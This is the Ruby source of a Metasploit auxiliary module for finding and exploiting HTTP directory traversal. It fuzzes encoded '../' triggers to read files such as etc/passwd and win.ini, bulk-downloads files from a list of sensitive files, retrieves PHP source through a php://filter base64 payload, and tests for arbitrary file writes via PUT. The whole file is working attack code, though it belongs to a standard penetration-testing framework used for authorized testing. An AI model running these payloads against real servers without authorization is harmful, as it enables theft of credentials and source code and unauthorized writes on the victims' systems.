metasploit-framework/modules/auxiliary/scanner/http/http_traversal.rb

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##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
#
# Thanks to:
# ipax, neriberto, flambaz, bperry, egypt, and sinn3r for help
#
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::WmapScanUniqueQuery
def initialize(info = {})
super(update_info(info,
'Name' => 'Generic HTTP Directory Traversal Utility',
'Description' => %q{
This module allows you to test if a web server (or web application) is
vulnerable to directory traversal with three different actions.
The 'CHECK' action (default) is used to automatically (or manually) find if
directory traversal exists in the web server, and then return the path that
triggers the vulnerability. The 'DOWNLOAD' action shares the same ability as
'CHECK', but will take advantage of the found trigger to download files based on
a 'FILELIST' of your choosing. The 'PHPSOURCE' action can be used to download
source against PHP applications. The 'WRITABLE' action can be used to determine
if the trigger can be used to write files outside the www directory.
To use the 'COOKIE' option, set your value like so: "name=value".
},
'Author' =>
[
'Ewerson Guimaraes(Crash) <crash[at]dclabs.com.br>',
'Michael Messner <devnull[at]s3cur1ty.de>',
'et <et[at]cyberspace.org>',
'sinn3r'
],
'License' => MSF_LICENSE,
'Actions' =>
[
['CHECK', {'Description' => 'Check for basic directory traversal'}],
['WRITABLE', {'Description' => 'Check if a traversal bug allows us to write anywhere'}],
['DOWNLOAD', {'Description' => 'Attempt to download files after bruteforcing a trigger'}],
['PHPSOURCE', {'Description' => 'Attempt to retrieve php source code files'}]
],
'DefaultAction' => 'CHECK'
))
register_options(
[
OptEnum.new('METHOD', [true, 'HTTP Request Method', 'GET', ['GET', 'POST', 'HEAD', 'PUT']]),
OptString.new('PATH', [true, 'Vulnerable path. Ex: /foo/index.php?pg=', '/']),
OptString.new('DATA', [false,'HTTP body data', '']),
OptInt.new('DEPTH', [true, 'Traversal depth', 5]),
OptRegexp.new('PATTERN', [true, 'Regexp pattern to determine directory traversal', '^HTTP/\\d\\.\\d 200']),
OptPath.new(
'FILELIST',
[
true,
'Wordlist file to brute force',
File.join(Msf::Config.install_root, 'data', 'wordlists', 'sensitive_files.txt')
])
], self.class)
register_advanced_options(
[
# We favor automatic
OptString.new('TRIGGER', [false,'Trigger string. Ex: ../', '']),
OptString.new('FILE', [false, 'Default file to read for the fuzzing stage', '']),
OptString.new('COOKIE', [false, 'Cookie value to use when sending the requests', ''])
], self.class)
deregister_options('RHOST')
end
# Avoids writing to datastore['METHOD'] directly
def http_method
@http_method || datastore['METHOD']
end
# Avoids writing to datastore['DATA'] directly
def data
@data || datastore['DATA']
end
#
# The fuzz() function serves as the engine for the module. It can intelligently mutate
# a trigger, and find potential bugs with it.
#
def fuzz
# Possible triggers
triggers =
[
"../", ".../", "..\\", ".\\..\\", "..///", ".\\./", ".//..//",
".%2e./", "%2e%2e/", "..%5c", "..%2f","..%c0%af.."
]
# Initialize the default file(s) we should try to read during fuzzing
if datastore['FILE'].empty?
file_to_read = ['etc/passwd', 'boot.ini', 'windows\\win.ini']
else
file_to_read = [datastore['FILE']]
end
# Each possible trigger, we try to traverse multiple levels down depending
# on datastore['DEPATH']
depth = datastore['DEPTH']
triggers.each do |base|
1.upto(depth) do |d|
file_to_read.each do |f|
trigger = base * d
p = normalize_uri(datastore['PATH']) + trigger + f
req = ini_request(p)
vprint_status("Trying: http://#{rhost}:#{rport}#{p}")
res = send_request_cgi(req, 25)
return trigger if res and res.to_s =~ datastore['PATTERN']
end
end
end
return nil
end
#
# This method will build the HTTP request based on what the user gives us
#
def ini_request(uri)
req = {}
case http_method
when 'GET'
# Example: Say we have the following datastore['PATH']
# '/test.php?page=1&id=3&note=whatever'
# We expect it to regex the GET parameters:
# 'page=1&id=3&note=whatever'
# And then let queryparse() to handle the rest
query_params = uri.match(/\?(\w+=.+&*)$/)
req['vars_get'] = queryparse(query_params[1]) if query_params
when 'POST'
req['vars_post'] = queryparse(data) if not data.empty?
when 'PUT'
req['data'] = data if not data.empty?
when 'HEAD'
end
if not req['vars_get'].nil? or not req['vars_post'].nil? or not req['data'].nil?
begin
this_path = URI(uri).path
rescue ::URI::InvalidURIError
this_path = uri.scan(/^(.+)\?*.*/).flatten[0]
end
else
this_path = uri
end
req['method'] = http_method
req['uri'] = this_path
req['headers'] = {'Cookie'=>datastore['COOKIE']} if not datastore['COOKIE'].empty?
req['data'] = data if not data.empty?
req['authorization'] = basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
return req
end
#
# Determine if we should automatically fuzz a trigger, or use the user-supplied one
#
def ini_trigger
return datastore['TRIGGER'] if not datastore['TRIGGER'].empty?
trigger = fuzz
if trigger.nil?
print_error("No trigger found")
else
print_good("Found trigger: #{trigger}")
end
return trigger
end
#
# Action 'CHECK': Find the trigger either automatically using fuzz(), or manually by
# setting the TRIGGER and FILE option
#
def check(trigger)
if datastore['TRIGGER'].empty?
# Found trigger using fuzz()
found = true if trigger
uri = normalize_uri(datastore['PATH']) + trigger
else
# Manual check. meh.
if datastore['FILE'].empty?
print_error("Must specify a 'FILE' to check manually")
return
end
uri = normalize_uri(datastore['PATH']) + trigger + datastore['FILE']
req = ini_request(uri)
vprint_status("Trying: http://#{rhost}:#{rport}#{uri}")
res = send_request_cgi(req, 25)
found = true if res and res.to_s =~ datastore['PATTERN']
end
# Reporting
if found
print_good("Directory traversal found: #{trigger}")
report_web_vuln({
:host => rhost,
:port => rport,
:vhost => datastore['VHOST'],
:path => uri,
:params => normalize_uri(datastore['PATH']),
:pname => trigger,
:risk => 3,
:proof => trigger,
:name => self.fullname,
:category => "web",
:method => http_method
})
else
print_error("No directory traversal detected")
end
end
#
# Action 'DOWNLOAD': Used to download a file with a directory traversal
#
def lfi_download(trigger, files)
counter = 0
files.each_line do |f|
# Our trigger already puts us in '/', so our filename doesn't need to begin with that
f = f[1,f.length] if f =~ /^\//
req = ini_request(uri = (normalize_uri(datastore['PATH']) + trigger + f).chop)
res = send_request_cgi(req, 25)
vprint_status("#{res.code.to_s} for http://#{rhost}:#{rport}#{uri}") if res
# Only download files that are withint our interest
if res and res.to_s =~ datastore['PATTERN']
# We assume the string followed by the last '/' is our file name
fname = f.split("/")[-1].chop
loot = store_loot("lfi.data","text/plain",rhost, res.body,fname)
print_good("File #{fname} downloaded to: #{loot}")
counter += 1
end
end
print_status("#{counter.to_s} file(s) downloaded")
end
#
# Action 'PHPSOURCE': Used to grab the php source code
#
def php_download(files)
counter = 0
files.each_line do |f|
# Our trigger already puts us in '/', so our filename doesn't need to begin with that
f = f[1,f.length] if f =~ /^\//
req = ini_request(uri = (normalize_uri(datastore['PATH']) + "php://filter/read=convert.base64-encode/resource=" + f).chop)
res = send_request_cgi(req, 25)
vprint_status("#{res.code.to_s} for http://#{rhost}:#{rport}#{uri}") if res
# We assume the string followed by the last '/' is our file name
fname = f.split("/")[-1].chop
loot = store_loot("php.data","text/plain",rhost,Rex::Text.decode_base64(res.body),fname)
print_good("File #{fname} downloaded to: #{loot}")
counter += 1
end
print_status("#{counter.to_s} source code file(s) downloaded")
end
#
# Action 'WRITABLE': This method will attempt to write to a directory outside of www
#
def is_writable(trigger)
# Modify some registered options for the PUT method
tmp_method = http_method
tmp_data = data
@http_method = 'PUT'
if data.empty?
unique_str = Rex::Text.rand_text_alpha(4) * 4
@data = unique_str
else
unique_str = data
end
# Form the PUT request
fname = Rex::Text.rand_text_alpha(rand(5) + 5) + '.txt'
uri = normalize_uri(datastore['PATH']) + trigger + fname
vprint_status("Attempt to upload to: http://#{rhost}:#{rport}#{uri}")
req = ini_request(uri)
# Upload our unique string, don't care much about the response
send_request_cgi(req, 25)
# Prepare request to read our file
@http_method = 'GET'
@data = tmp_data
req = ini_request(uri)
vprint_status("Verifying upload...")
res = send_request_cgi(req, 25)
# Did we get it?
if res and res.body =~ /#{unique_str}/
print_good("WRITE is possible on #{rhost}:#{rport}")
else
print_error("WRITE seems unlikely")
end
# Ah, don't forget to restore our method
@http_method = tmp_method
end
#
# Load the whole file list
# This is used in the lfi_download() function
#
def load_filelist
File.open(datastore['FILELIST'], 'rb') {|f| f.read}
end
def run_host(ip)
# Warn if it's not a well-formed UPPERCASE method
if http_method !~ /^[A-Z]+$/
print_warning("HTTP method #{http_method} is not Apache-compliant. Try only UPPERCASE letters.")
end
print_status("Running action: #{action.name}...")
# And it's..... "SHOW TIME!!"
if action.name == 'CHECK'
trigger = ini_trigger
return if trigger.nil?
check(trigger)
elsif action.name == 'WRITABLE'
trigger = ini_trigger
return if trigger.nil?
is_writable(trigger)
elsif action.name == 'PHPSOURCE'
trigger = ini_trigger
return if trigger.nil?
files = load_filelist
php_download(files)
elsif action.name == 'DOWNLOAD'
trigger = ini_trigger
return if trigger.nil?
# Load up a file list that we wish to download, and then attempt to download them
# with our directory traversal trigger
files = load_filelist
lfi_download(trigger, files)
end
end
end